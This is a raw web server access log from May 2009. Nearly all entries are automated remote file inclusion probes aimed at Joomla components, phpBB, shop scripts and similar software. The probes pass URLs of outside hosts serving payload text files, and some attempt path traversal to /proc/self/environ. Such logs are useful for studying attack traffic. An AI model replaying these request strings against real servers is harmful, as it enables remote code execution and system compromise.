69.237.82.158 - - [23/May/2009:06:09:05 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:06:09:06 -0400] "GET /logs/access_log.Q109021900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:10:32 -0400] "GET /logs/modules/news/article.php?storyid=3';return%20true%22%20onMouseOut=%22window.status='';return%20true;%22%20href=%22http:/mamma.infospace.com/clickserver/=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:10:37 -0400] "GET /modules/news/article.php?storyid=3';return%20true%22%20onMouseOut=%22window.status='';return%20true;%22%20href=%22http:/mamma.infospace.com/clickserver/=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:10:48 -0400] "GET /logs/access_log.Q108061500/modules/news/article.php?storyid=3';return%20true%22%20onMouseOut=%22window.status='';return%20true;%22%20href=%22http:/mamma.infospace.com/clickserver/=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:06:10:51 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:06:10:51 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:11:09 -0400] "GET /logs/access_log.Q109051200/modules/news/article.php?storyid=3';return%20true%22%20onMouseOut=%22window.status='';return%20true;%22%20href=%22http:/mamma.infospace.com/clickserver/=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.213.0.1 - - [23/May/2009:06:11:11 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
200.213.0.1 - - [23/May/2009:06:11:12 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
200.213.0.1 - - [23/May/2009:06:11:12 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
201.232.54.48 - - [23/May/2009:06:11:19 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:06:11:19 -0400] "GET /logs/access_log.Q108111500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:06:11:23 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:12:03 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:12:06 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2496 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:12:06 -0400] "GET /logs/access_log.Q109050300///?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:06:12:16 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C94317D147004B6D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.109.101.217 - - [23/May/2009:06:12:40 -0400] "GET /logs/access_log.Q108111500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:06:12:44 -0400] "GET /logs/access_log.Q108111500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:13:17 -0400] "GET /errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:13:22 -0400] "GET /logs/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:13:22 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:13:22 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:06:13:41 -0400] "GET /logs/access_log.Q108110900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:06:13:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.237.146.58 - - [23/May/2009:06:14:11 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:14:11 -0400] "GET /errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:14:13 -0400] "GET /logs/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:14:13 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:14:19 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:14:19 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:14:19 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:14:20 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:14:20 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:14:20 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.213.0.1 - - [23/May/2009:06:14:55 -0400] "GET /logs/access_log.Q109051200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
66.175.122.228 - - [23/May/2009:06:15:36 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.125.64.49 - - [23/May/2009:06:15:42 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.104.47.218 - - [23/May/2009:06:16:03 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:16:03 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:16:10 -0400] "GET /errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:16:10 -0400] "GET /logs/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:16:10 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:16:11 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.234.63.110 - - [23/May/2009:06:16:20 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.234.63.110 - - [23/May/2009:06:16:20 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:06:16:51 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:06:16:51 -0400] "GET /logs/access_log.Q108111500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
66.199.250.194 - - [23/May/2009:06:17:07 -0400] "GET /index.php?cont=http://www.maliodkrywcy.pl///images/txt.html.txt??? HTTP/1.1" 404 207 "-" "Mozilla/4.61 [en] (OS/2; U)"
66.199.250.194 - - [23/May/2009:06:17:07 -0400] "GET /logs/index.php?cont=http://www.maliodkrywcy.pl///images/txt.html.txt??? HTTP/1.1" 404 212 "-" "Mozilla/4.61 [en] (OS/2; U)"
123.125.64.51 - - [23/May/2009:06:17:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.104.47.218 - - [23/May/2009:06:18:07 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.24.49.35 - - [23/May/2009:06:18:08 -0400] "GET /logs//update/update3.php?lang=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
59.24.49.35 - - [23/May/2009:06:18:08 -0400] "GET //update/update3.php?lang=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
59.24.49.35 - - [23/May/2009:06:18:10 -0400] "GET /logs//update/update3.php?lang=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
59.24.49.35 - - [23/May/2009:06:18:10 -0400] "GET //update/update3.php?lang=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:18:14 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:06:18:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
60.251.217.4 - - [23/May/2009:06:19:20 -0400] "GET /modules/vwar/convert/mvcw.php?step=1&vwar_root=ziNYK4t6Z1cC&pg=PA550&lpg=PA550&dq=vwar&source=bl&ots=IlJ3tA8hBM&sig=_pHqLG0RFHZ_gbp7J_NmdIH0Xos&hl=id&ei=5ccXSoKALIGdkAX1pDw&sa=X&oi=book_result&ct=result&resnum=38/=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:19:20 -0400] "GET /logs/access_log.Q108091400/modules/vwar/convert/mvcw.php?step=1&vwar_root=ziNYK4t6Z1cC&pg=PA550&lpg=PA550&dq=vwar&source=bl&ots=IlJ3tA8hBM&sig=_pHqLG0RFHZ_gbp7J_NmdIH0Xos&hl=id&ei=5ccXSoKALIGdkAX1pDw&sa=X&oi=book_result&ct=result&resnum=38/=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:19:26 -0400] "GET /logs/modules/vwar/convert/mvcw.php?step=1&vwar_root=ziNYK4t6Z1cC&pg=PA550&lpg=PA550&dq=vwar&source=bl&ots=IlJ3tA8hBM&sig=_pHqLG0RFHZ_gbp7J_NmdIH0Xos&hl=id&ei=5ccXSoKALIGdkAX1pDw&sa=X&oi=book_result&ct=result&resnum=38/=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:06:19:33 -0400] "GET /logs/access_log.Q108110900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:19:43 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:20:23 -0400] "GET /logs/access_log.Q109051200%20%20/modules/news/article.php?storyid=3';return%20true%22%20onMouseOut=%22window.status='';return%20true;%22%20href=%22http:/mamma.infospace.com/clickserver/=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.29.32.146 - - [23/May/2009:06:20:41 -0400] "GET /logs/%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.29.32.146 - - [23/May/2009:06:20:41 -0400] "GET /%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.29.32.146 - - [23/May/2009:06:20:41 -0400] "GET /logs/access_log.Q108081800/%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.29.32.146 - - [23/May/2009:06:20:42 -0400] "GET /logs/access_log.Q108081800/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
202.29.32.146 - - [23/May/2009:06:20:43 -0400] "GET /logs/access_log.Q108081800/%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-" "XXXXXX"
202.29.32.146 - - [23/May/2009:06:20:43 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
202.29.32.146 - - [23/May/2009:06:20:43 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
202.29.32.146 - - [23/May/2009:06:20:44 -0400] "GET /logs/access_log.Q108081800/%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "XXXXXX"
202.29.32.146 - - [23/May/2009:06:20:44 -0400] "GET /logs/%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 276 "-" "XXXXXX"
202.29.32.146 - - [23/May/2009:06:20:44 -0400] "GET /%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 271 "-" "XXXXXX"
202.29.32.146 - - [23/May/2009:06:20:45 -0400] "GET /%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 271 "-" "XXXXXX"
202.29.32.146 - - [23/May/2009:06:20:45 -0400] "GET /logs/%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 276 "-" "XXXXXX"
78.40.224.155 - - [23/May/2009:06:20:56 -0400] "GET //update/update3.php?lang=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.40.224.155 - - [23/May/2009:06:20:56 -0400] "GET /logs//update/update3.php?lang=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:21:08 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:06:21:22 -0400] "GET /images/tools/ HTTP/1.0" 200 3659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.40.224.155 - - [23/May/2009:06:21:26 -0400] "GET //update/update3.php?lang=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.40.224.155 - - [23/May/2009:06:21:26 -0400] "GET /logs//update/update3.php?lang=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:21:49 -0400] "GET /logs/access_log.Q108091400%20%20/modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:06:22:28 -0400] "GET /logs/access_log.Q108110900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:06:23:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.104.47.218 - - [23/May/2009:06:23:52 -0400] "GET /logs/access_log.Q108091400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:25:46 -0400] "GET /logs/access_log.Q108091400/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:06:28:13 -0400] "GET /logs/access_log.Q108082200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [23/May/2009:06:28:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.194.87.219 - - [23/May/2009:06:29:08 -0400] "GET /logs//modules/errors.php?error=http://www.schnee-teufel.de/shop/images/id? HTTP/1.1" 404 222 "-" "libwww-perl/5.822"
82.194.87.219 - - [23/May/2009:06:29:31 -0400] "GET /logs//modules/errors.php?error=http://www.schnee-teufel.de/shop/images/id? HTTP/1.1" 404 222 "-" "libwww-perl/5.822"
66.175.122.228 - - [23/May/2009:06:29:32 -0400] "GET /logs/access_log.Q108111500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:29:41 -0400] "GET /shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:29:42 -0400] "GET /logs/shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:29:42 -0400] "GET /logs/access_log.Q108111500%20%20/shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:06:30:29 -0400] "GET /images/over-index18_sharpscol.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.175.122.228 - - [23/May/2009:06:30:36 -0400] "GET /logs/access_log.Q108110900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:30:44 -0400] "GET /shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:30:44 -0400] "GET /logs/access_log.Q108100700/shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:30:44 -0400] "GET /logs/shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:32:18 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:32:18 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:32:18 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:32:22 -0400] "GET /logs/access_log.Q108091400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:32:40 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:32:40 -0400] "GET /logs/access_log.Q108091400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:32:42 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:32:42 -0400] "GET /logs/access_log.Q108091400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:32:45 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:06:32:51 -0400] "GET /logs/access_log.Q108111500/shop/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.191.103.144 - - [23/May/2009:06:33:17 -0400] "GET /logs/access_log.Q108111700//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:06:33:17 -0400] "GET //?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:06:33:17 -0400] "GET /logs//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.825"
209.59.12.99 - - [23/May/2009:06:33:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [23/May/2009:06:33:47 -0400] "GET /logs/access_log.Q108111700//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:06:33:47 -0400] "GET //?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:06:33:47 -0400] "GET /logs//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
58.227.193.198 - - [23/May/2009:06:34:07 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:34:07 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:34:07 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
